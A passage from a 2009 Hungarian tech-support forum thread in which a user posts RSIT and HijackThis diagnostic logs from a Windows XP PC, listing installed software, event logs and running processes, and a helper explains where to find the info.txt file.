S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]

-----------------EOF-----------------

info.txt:
info.txt logfile of random's system information tool 1.06 2009-05-23 14:29:26

======Uninstall list======

##CAMERADRIVERNAME##-->"C:\Program Files\Common Files\Logitech\QCDRV\BIN\SETUP.EXE" UNINSTALL REMOVEPROMPT
-->C:\Program Files\Ahead\nero\uninstall\UNNERO.exe /UNINSTALL
-->C:\WINDOWS\UNNeroVision.exe /UNINSTALL
-->Dummy
-->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
1.11.9.0-->"C:\Program Files\MCS Electronics\BASCOM-AVR 1.11.9.0\unins000.exe"
7-Zip 4.63-->"C:\Program Files\7-Zip\Uninstall.exe"
Active WebCam Viewer-->"C:\WINDOWS\system32\PY_UNINSTAL.EXE" SOFTWARE\PySoft\Act_WebCam\Viewer
Active WebCam-->"C:\Program Files\Active WebCam\PY_UNINSTAL.EXE" SOFTWARE\PySoft\Act_WebCam
Adobe Acrobat 8 Professional - English, Français, Deutsch-->msiexec /I {AC76BA86-1033-F400-7760-000000000003}
Adobe Anchor Service CS3-->MsiExec.exe /I{90176341-0A8B-4CCC-A78D-F862228A6B95}
Adobe Asset Services CS3-->MsiExec.exe /I{6FF5DD7A-FE28-4439-B8CF-1E9AF4EA0A61}
Adobe Bridge CS3-->MsiExec.exe /I{9C9824D9-9000-4373-A6A5-D0E5D4831394}
Adobe Bridge Start Meeting-->MsiExec.exe /I{08B32819-6EEF-4057-AEDA-5AB681A36A23}
Adobe Camera Raw 4.0-->MsiExec.exe /I{B3BF6689-A81D-40D8-9A86-4AC4ACD9FC1C}
Adobe CMaps-->MsiExec.exe /I{A2B242BD-FF8D-4840-9DAA-9170EABEC59C}
Adobe Color - Photoshop Specific-->MsiExec.exe /I{A2D81E70-2A98-4A08-A628-94388B063C5E}
Adobe Color Common Settings-->MsiExec.exe /I{DADD7B8A-BCB0-44F5-967A-ECB6B4F2ECD9}
Adobe Color EU Extra Settings-->MsiExec.exe /I{51846830-E7B2-4218-8968-B77F0FF475B8}
Adobe Color EU Recommended Settings-->MsiExec.exe /I{BD087F50-46B2-43E4-BD73-5DB3DC20B47C}
Adobe Color JA Extra Settings-->MsiExec.exe /I{D92B72E2-C854-4738-8ED6-4C3661CC17AE}
Adobe Color NA Extra Settings-->MsiExec.exe /I{6179A7D2-A668-4F1D-BC9A-DCC6A10C7871}
Adobe Color NA Recommended Settings-->MsiExec.exe /I{95655ED4-7CA5-46DF-907F-7144877A32E5}
Adobe Default Language CS3-->MsiExec.exe /I{B9B35331-B7E4-4E5C-BF4C-7BC87856124D}
Adobe Device Central CS3-->MsiExec.exe /I{8D2BA474-F406-4710-9AE4-D4F22D21F0DD}
Adobe ExtendScript Toolkit 2-->MsiExec.exe /I{C2D69781-F392-4118-A5A7-C7E9C38DBFC2}
Adobe Flash CS3 Professional-->C:\Program Files\Common Files\Adobe\Installers\c3c7fe8b09d497ab2b3fd91c9353390\Setup.exe
Adobe Flash CS3-->MsiExec.exe /I{6B52140A-F189-4945-BFFC-DB3F00B8C589}
Adobe Flash Player 10 Plugin-->C:\WINDOWS\system32\Macromed\Flash\uninstall_plugin.exe
Adobe Flash Player 9 ActiveX-->MsiExec.exe /X{BC4F8E84-5E29-49EC-B4E7-E6F9CB50986C}
Adobe Flash Video Encoder-->MsiExec.exe /I{2EFFFC71-1E66-454E-A6E6-CEEC800B96D2}
Adobe Fonts All-->MsiExec.exe /I{6ABE0BEE-D572-4FE8-B434-9E72A289431B}
Adobe Help Viewer CS3-->MsiExec.exe /I{04AF207D-9A77-465A-8B76-991F6AB66245}
Adobe Linguistics CS3-->MsiExec.exe /I{54793AA1-5001-42F4-ABB6-C364617C6078}
Adobe PDF Library Files-->MsiExec.exe /I{D2559B88-CC9D-4B48-81BB-F492BAA9C48C}
Adobe Photoshop CS3-->C:\Program Files\Common Files\Adobe\Installers\6ba4f64693cf3ffde4382ffeebd542f\Setup.exe
Adobe Photoshop CS3-->MsiExec.exe /I{E66F3AFD-643B-4001-A3B3-35616CCFECEA}
Adobe Setup-->MsiExec.exe /I{6850DD2F-1DDC-4438-95DC-03CFBC0405FB}
Adobe Setup-->MsiExec.exe /I{FFC1ADE3-944B-4231-894E-3903C37271D2}
Adobe Stock Photos CS3-->MsiExec.exe /I{29E5EA97-5F74-4A57-B8B2-D4F169117183}
Adobe Type Support-->MsiExec.exe /I{8E6808E2-613D-4FCD-81A2-6C8FA8E03312}
Adobe Update Manager CS3-->MsiExec.exe /I{E69AE897-9E0B-485C-8552-7841F48D42D8}
Adobe Version Cue CS3 Client-->MsiExec.exe /I{D0DFF92A-492E-4C40-B862-A74A173C25C5}
Adobe WinSoft Linguistics Plugin-->MsiExec.exe /I{184CE391-7E0E-4C63-9935-D7A10EDFD3C6}
Adobe XMP Panels CS3-->MsiExec.exe /I{D5A31AB1-345D-47C7-A87B-036A669F6DF1}
AMCap-->C:\Program Files\Noel Danjou\AMCap\uninst.exe
Any Video Converter 2.6.7-->"C:\Program Files\Any Video Converter\unins000.exe"
BASCOM-AVR-->"C:\Program Files\MCS Electronics\BASCOM-AVR 1.11.9.1\unins000.exe"
Call of Duty(R) 4 - Modern Warfare(TM) 1.6 Patch-->C:\Program Files\InstallShield Installation Information\{8A15B7D9-908A-4EF9-BA84-5AEDE61743EE}\setup.exe -runfromtemp -l0x0409
Call of Duty(R) 4 - Modern Warfare(TM) 1.7 Patch-->C:\Program Files\InstallShield Installation Information\{931C37FC-594D-43A9-B10F-A2F2B1F03498}\setup.exe -runfromtemp -l0x0409
Call of Duty(R) 4 - Modern Warfare(TM)-->C:\Program Files\InstallShield Installation Information\{E48469CC-635E-4FD5-A122-1497C286D217}\setup.exe -runfromtemp -l0x0409
CCleaner (remove only)-->"C:\Program Files\CCleaner\uninst.exe"
DivX-->C:\Program Files\DivX\DivXCodecUninstall.exe /CODEC
EAGLE 5.3.0-->cmd.exe /c start "EAGLE Uninstaller" /min "C:\Program Files\EAGLE-5.3.0\bin\uninstall.bat" C:\Program Files\EAGLE-5.3.0\bin
ESET NOD32 Antivirus-->MsiExec.exe /I{9361BBAC-B475-4E74-9D7E-9C3FBEB8B3AF}
Fujitsu Siemens Computers WLAN 802.11b/g D1705/D1706-->C:\WINDOWS\system32\unwlsdrv.exe SiS163u
Grand Theft Auto IV-->"C:\Program Files\InstallShield Installation Information\{579BA58C-F33D-4970-9953-B94B43768AC3}\setup.exe" -runfromtemp -l0x0009 -removeonly
Grand Theft Auto: San Andreas hun [Honosítás]-->C:\WINDOWS\Grand Theft Auto_ San Andreas hun Uninstaller.exe
GTA San Andreas-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\10\50\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}\setup.exe" -l0x9 -removeonly
Guitar Pro 5.2-->"C:\Program Files\Guitar Pro 5\unins000.exe"
HD Tune 2.55-->"C:\Program Files\HD Tune\unins000.exe"
HijackThis 2.0.2-->"C:\Documents and Settings\Bence\Dokumentumok\Programok telepítője\HijackThis.exe" /uninstall
Hotfix for Windows Media Format SDK (KB902344)-->"C:\WINDOWS\$NtUninstallKB902344$\spuninst\spuninst.exe"
HP Document Viewer 7.0-->C:\Program Files\HP\Digital Imaging\DocumentViewer\hpzscr01.exe -datfile hpqbud04.dat
HP Photosmart, Officejet and Deskjet 7.0.A-->C:\Program Files\HP\Digital Imaging\{BDBE2F3E-42DB-4d4a-8CB1-19BA765DBC6C}\setup\hpzscr01.exe -datfile hposcr11.dat
InCD-->C:\WINDOWS\NuNInst.exe /UNINSTALL
InterVideo WinDVD-->"C:\Program Files\InstallShield Installation Information\{91810AFC-A4F8-4EBA-A5AA-B198BBC81144}\setup.exe" REMOVEALL
J2SE Runtime Environment 5.0 Update 6-->MsiExec.exe /I{3248F0A8-6813-11D6-A77B-00B0D0150060}
Java(TM) 6 Update 11-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216011FF}
KFWS-->C:\Program Files\KeyFocus\KFWS\Uninstall.exe "C:\Program Files\KeyFocus\KFWS\install.log"
LCDcenter-->C:\WINDOWS\st6unst.exe -n "C:\Program Files\LCDcenter\ST6UNST.LOG"
LimeWire 4.18.6-->"C:\Program Files\LimeWire\uninstall.exe"
Messenger Plus! Live-->"C:\Program Files\Messenger Plus! Live\Uninstall.exe"
Microsoft .NET Framework 1.1 Hotfix (KB886903)-->"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\hotfix.exe" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Updates\M886903\M886903Uninstall.msp"
Microsoft .NET Framework 1.1 Hungarian Language Pack-->MsiExec.exe /X{8FC113D5-64A6-40EE-9A39-DAB4650457A8}
Microsoft .NET Framework 1.1-->msiexec.exe /X {CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
Microsoft .NET Framework 1.1-->MsiExec.exe /X{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}
Microsoft .NET Framework 2.0-->C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0\install.exe
Microsoft .NET Framework 3.0-->c:\WINDOWS\Microsoft.NET\Framework\v3.0\Microsoft .NET Framework 3.0\setup.exe
Microsoft .NET Framework 3.0-->MsiExec.exe /X{15095BF3-A3D7-4DDF-B193-3A496881E003}
Microsoft Games for Windows - LIVE -->MsiExec.exe /X{4AA3D64E-9EC3-4B0F-AB91-5885AC55641F}
Microsoft Games for Windows - LIVE Redistributable-->MsiExec.exe /X{FD052FB9-FE90-4438-B355-15EDC89D8FB1}
Microsoft Kernel-Mode Driver Framework Feature Pack 1.7-->"C:\WINDOWS\$NtUninstallWdf01007$\spuninst\spuninst.exe"
Microsoft MSDN 2005 Express Edition - ENU-->C:\Program Files\Microsoft Visual Studio 8\Microsoft MSDN 2005 Express Edition - ENU\install.exe
Microsoft Office XP Professional és FrontPage-->MsiExec.exe /I{9028040E-6000-11D3-8CFE-0050048383C9}
Microsoft SQL Server Desktop Engine (PINNACLESYS)-->MsiExec.exe /X{E09B48B5-E141-427A-AB0C-D3605127224A}
Microsoft User-Mode Driver Framework Feature Pack 1.0-->"C:\WINDOWS\$NtUninstallWudf01000$\spuninst\spuninst.exe"
Microsoft Virtual PC 2007-->MsiExec.exe /X{8A7CAA24-7B23-410B-A7C3-F994B0944160}
Microsoft Visual Basic 2005 Express Edition - ENU-->C:\Program Files\Microsoft Visual Studio 8\Microsoft Visual Basic 2005 Express Edition - ENU\setup.exe
Microsoft Visual Basic 2005 Express Edition - ENU-->MsiExec.exe /X{577AD794-8B34-40B4-9E7A-BE4CFFE396E6}
Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{7299052b-02a4-4627-81f2-1818da5d550d}
MSXML 4.0 SP2 Parser and SDK-->MsiExec.exe /I{716E0306-8318-4364-8B8F-0CC4E9376BAC}
MSXML 6.0 Parser (KB927977)-->MsiExec.exe /I{5A710547-B58E-488B-828D-CA9A25A0533C}
Nero Suite-->C:\Program Files\Common Files\Nero\Uninstall\Setupx.exe /uninstall ExtraUninstallID=""
NTREGOPT 1.1j-->"C:\Program Files\NT Registry Optimizer\unins000.exe"
NVIDIA Drivers-->C:\WINDOWS\system32\nvuninst.exe UninstallGUI
OpenMG Limited Patch 4.7-07-14-05-01-->C:\Program Files\Common Files\Sony Shared\OpenMG\HotFixes\HotFix4.7-07-14-05-01\HotFixSetup\setup.exe /u
OpenMG Secure Module 4.7.00-->C:\PROGRA~1\COMMON~1\INSTAL~1\Driver\1150\INTEL3~1\IDriver.exe /M{CCD663AE-610D-4BDF-AAB0-E914B044527D} UNINSTALL
Opera 9.63-->MsiExec.exe /X{1BC4026B-1957-4514-9058-2B542557F143}
PDF Settings-->MsiExec.exe /I{293D5729-7C01-4FA4-A4DE-BB6A1587BBB9}
Pinnacle MediaCenter-->"C:\Program Files\InstallShield Installation Information\{F38ADCA4-AF7C-4C73-9021-6F1EA15D15EA}\Setup.exe"UNINSTALL /l0x000e
Pinnacle MediaServer-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\09\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{460CE8B9-6EC2-458A-90D4-691631ECE9D9}\setup.exe" -l0xe UNINSTALL
PonyProg2000 v2.07c-->"C:\Program Files\PonyProg2000\unins000.exe"
QuickTime-->MsiExec.exe /I{5B09BD67-4C99-46A1-8161-B7208CE18121}
Realtek High Definition Audio Driver-->RtlUpd.exe -r -m
Rockstar Games Social Club-->"C:\Program Files\InstallShield Installation Information\{08B3869E-D282-424C-9AFC-870E04A4BA14}\setup.exe" -runfromtemp -l0x0009 -removeonly
SonicStage 4.3-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\PROFES~1\RunTime\10\01\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{A0EB195B-5876-48E6-879D-33D4B2102610}\setup.exe" -l0x9 UNINSTALL -removeonly
Sony Ericsson Media Manager 1.1-->MsiExec.exe /X{2E0C4E9E-6ED1-4F86-A4C6-D0D84B77B29E}
Sothink SWF Decompiler-->"C:\Program Files\SourceTec\Sothink SWF Decompiler\unins000.exe"
Star Wars Jedi Knight Jedi Academy-->RunDll32 C:\PROGRA~1\COMMON~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}\Setup.exe" -l0x9
SystemDiagnostics-->MsiExec.exe /X{2F04C9DA-94DA-4361-8B34-02CD8187861F}
Total Commander (Remove or Repair)-->C:\Program Files\Totalcmd\tcuninst.exe
VC 9.0 Runtime-->MsiExec.exe /I{A040AC77-C1AA-4CC9-8931-9F648AF178F6}
VIA Rhine-Family Fast Ethernet Adapter-->Rundll32.exe vuins32.dll,vuins32Ex $Rhine $VIA
Virtual DJ - Atomix Productions-->C:\PROGRA~1\VIRTUA~1\UNWISE.EXE C:\PROGRA~1\VIRTUA~1\INSTALL.LOG
VLC media player 0.9.8a-->C:\Program Files\VideoLAN\VLC\uninstall.exe
WavePad Uninstall-->C:\Program Files\NCH Swift Sound\WavePad\uninst.exe
webcamXP 2007-->"C:\Program Files\webcamXP\wxp-uninst.exe"
web'n'walk Manager-->MsiExec.exe /X{2FA7D8E9-D3C0-4E62-BD8E-60BD598D1835}
Windows Communication Foundation-->MsiExec.exe /X{491DD792-AD81-429C-9EB4-86DD3D22E333}
Windows Live installer-->MsiExec.exe /X{999CE3F5-C179-4607-BEDF-B9544B0DD232}
Windows Live Messenger-->MsiExec.exe /X{AF2815A6-0573-45A4-BAE3-3194C1D4393C}
Windows Media Format 11 runtime-->"C:\WINDOWS\$NtUninstallWMFDist11$\spuninst\spuninst.exe"
Windows Media Format Runtime-->"C:\Program Files\Windows Media Player\wmsetsdk.exe" /UninstallAll
Windows Media Format SDK Hotfix - KB891122-->"C:\WINDOWS\$NtUninstallKB891122$\spuninst\spuninst.exe"
Windows Media Player 10 Biztonsági frissítés (KB917734)-->"C:\WINDOWS\$NtUninstallKB917734_WMP10$\spuninst\spuninst.exe"
Windows Media Player 10 Hotfix - KB888656-->"C:\WINDOWS\$NtUninstallKB888656$\spuninst\spuninst.exe"
Windows Media Player 10-->"C:\Program Files\Windows Media Player\Setup_wm.exe" /Uninstall
Windows Media Player Firefox Plugin-->MsiExec.exe /I{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}
Windows Presentation Foundation-->MsiExec.exe /X{BAF78226-3200-4DB4-BE33-4D922A799840}
Windows Workflow Foundation-->MsiExec.exe /I{7D1B85BD-AA07-48B8-808D-67A4067FC6BD}
Windows XP Service Pack 3-->"C:\WINDOWS\$NtServicePackUninstall$\spuninst\spuninst.exe"
Yamaha UW10 drivers-->C:\WINDOWS\usb-audio.de\SETUP.exe /u /iYAMAHA_UW10 /rusb-audio.deYAMAHA_UW10
ZoneAlarm Spy Blocker-->rundll32 C:\PROGRA~1\ZONEAL~1\bar\1.bin\SpyBlock.dll,O
ZoneAlarm-->C:\Program Files\Zone Labs\ZoneAlarm\zauninst.exe

======Security center information======

AV: ESET NOD32 Antivirus 3.0
FW: ZoneAlarm Firewall

======System event log======

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20717
Source Name: PlugPlayManager
Time Written: 20090514142243.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20716
Source Name: PlugPlayManager
Time Written: 20090514142243.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20715
Source Name: PlugPlayManager
Time Written: 20090514142243.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20714
Source Name: PlugPlayManager
Time Written: 20090514142242.000000+120
Event Type: figyelmeztetés
User:

Computer Name: BEZSO
Event Code: 257
Message: Időtúllépés, miközben a rendszer a céleszköz változásáról üzenetet küldött a(z) "InCD_GUI_MAINFRAME__1A6E0D67_3515_471D_8D7D_C8E76EC0DA2A" ablakba.

Record Number: 20713
Source Name: PlugPlayManager
Time Written: 20090514142242.000000+120
Event Type: figyelmeztetés
User:

=====Application event log=====

Computer Name: BEZSO
Event Code: 103
Message: MsnMsgr (1016) \\.\C:\Documents and Settings\Bence\Local Settings\Application Data\Microsoft\Messenger\s.bence@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor leállított egy példányt: 0.

Record Number: 5922
Source Name: ESENT
Time Written: 20090419220231.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 102
Message: MsnMsgr (1016) \\.\C:\Documents and Settings\Bence\Local Settings\Application Data\Microsoft\Messenger\s.bence@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor új példányt indított el: 0.

Record Number: 5921
Source Name: ESENT
Time Written: 20090419212531.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 100
Message: MsnMsgr (1016) A(z) 5.01.2600.5512 adatbázismotor elindult.

Record Number: 5920
Source Name: ESENT
Time Written: 20090419212531.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 302
Message: msnmsgr (1888) \\.\C:\Documents and Settings\Zsombor\Local Settings\Application Data\Microsoft\Messenger\zsombor@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor sikeresen befejezte a helyreállítás lépéseit.

Record Number: 5919
Source Name: ESENT
Time Written: 20090419200408.000000+120
Event Type: információ
User:

Computer Name: BEZSO
Event Code: 301
Message: msnmsgr (1888) \\.\C:\Documents and Settings\Zsombor\Local Settings\Application Data\Microsoft\Messenger\zsombor@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\dfsr.db: Az adatbázismotor újra lejátssza a következő naplófájlt: \\.\C:\Documents and Settings\Zsombor\Local Settings\Application Data\Microsoft\Messenger\zsombor@index.hu\SharingMetadata\Working\database_DC10_C45E_10C4_416E\fsr.log.

Record Number: 5918
Source Name: ESENT
Time Written: 20090419200408.000000+120
Event Type: információ
User:

======Environment variables======

"ComSpec"=%SystemRoot%\system32\cmd.exe
"Path"=%systemroot%\system32;%systemroot%;%systemroot%\system32\wbem;C:\Program Files\Microsoft SQL Server\80\Tools\Binn;C:\Program Files\QuickTime\QTSystem
"windir"=%SystemRoot%
"FP_NO_HOST_CHECK"=NO
"OS"=Windows_NT
"PROCESSOR_ARCHITECTURE"=x86
"PROCESSOR_LEVEL"=6
"PROCESSOR_IDENTIFIER"=x86 Family 6 Model 15 Stepping 6, GenuineIntel
"PROCESSOR_REVISION"=0f06
"NUMBER_OF_PROCESSORS"=2
"PATHEXT"=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
"TEMP"=%SystemRoot%\TEMP
"TMP"=%SystemRoot%\TEMP
"tvdumpflags"=8
"RGSCLauncher"=C:\Program Files\Rockstar Games\Rockstar Games Social Club
"RGSC"=C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_0_0_0
"CLASSPATH"=.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip
"QTJAVA"=C:\Program Files\Java\jre6\lib\ext\QTJava.zip

-----------------EOF-----------------


szomb. máj. 23, 2009 13:40
Profil Privát üzenet küldése
ezüst tag

Csatlakozott: csüt. jún. 21, 2007 10:27
Hozzászólások: 92
Hozzászólás 
Értem, de nem volt ott csak a log.txt. De megpróbálom mégegyszer.


szomb. máj. 23, 2009 13:25
Profil Privát üzenet küldése
a fórum lelke
Avatar

Csatlakozott: vas. jún. 24, 2007 10:18
Hozzászólások: 6679
Tartózkodási hely: Revuca.S.k>>Szlovákia, nem tudok jól magyarul írni, ezért ilyen amit látsz,
Hozzászólás 
info.txt>>ez a talcan lesz
Azon a vekony listan aloll minimalisitva van az Info.txt


szomb. máj. 23, 2009 13:08
Profil Privát üzenet küldése Honlap
ezüst tag

Csatlakozott: csüt. jún. 21, 2007 10:27
Hozzászólások: 92
Hozzászólás 
Csak log.txt-t adott:

Logfile of random's system information tool 1.06 (written by random/random)
Run by Zsombor at 2009-05-23 13:53:47
Microsoft Windows XP Home Edition Szervizcsomag 3
System drive C: has 68 GB (45%) free of 153 GB
Total RAM: 3070 MB (85% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:54:42, on 2009.05.23.
Platform: Windows XP Szervizcsomag 3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\ZoneLabs\vsmon.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe
C:\Program Files\Rockstar Games\Rockstar Games Social Club\1_1_3_0\RGSC.exe
C:\Documents and Settings\Zsombor\Asztal\RSIT.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\trend micro\Zsombor.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: ZoneAlarm Spy Blocker BHO - {F0D4B231-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: ZoneAlarm Spy Blocker - {F0D4B239-DA4B-4daf-81E4-DFEE4931A4AA} - C:\Program Files\ZoneAlarmSB\bar\1.bin\SPYBLOCK.DLL
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [RGSC] C:\Program Files\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xportálás Microsoft Excel formátumba - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra 'Tools' menuitem: Sothink SWF Catcher - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Program Files\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/windows ... 0564585359
